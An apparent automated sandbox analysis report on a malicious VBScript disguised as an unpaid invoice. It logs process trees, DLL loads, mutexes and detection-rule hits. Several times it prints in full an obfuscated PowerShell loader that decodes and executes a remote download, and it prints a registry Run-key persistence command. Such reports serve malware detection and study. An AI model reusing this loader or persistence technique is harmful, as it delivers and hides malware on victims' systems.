                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A17BF323_2_00007FFD9A17BF32
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A17B1823_2_00007FFD9A17B182
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD9A24A7EA3_2_00007FFD9A24A7EA
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A4EDE05_2_04A4EDE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A4FAB85_2_04A4FAB8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A4EA985_2_04A4EA98
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_077FCEF05_2_077FCEF0
                Source: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbsInitial sample: Strings found which are bigger than 50
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6215
                Source: unknownProcess created: Commandline size = 6215
                Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6215Jump to behavior
                Source: amsi32_8168.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7876, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 8168, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@16/8@4/2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Clothesman.VinJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2136:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8176:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7816:120:WilError_03
                Source: C:\Windows\SysWOW64\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-TXCR8B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55lrmmve.za3.ps1Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
                Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;Ekstremisters.exe&apos;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7876
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=8168
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
                Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVit
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty #>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI; function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging; for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio. alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness 'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness 'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told ');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor (pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
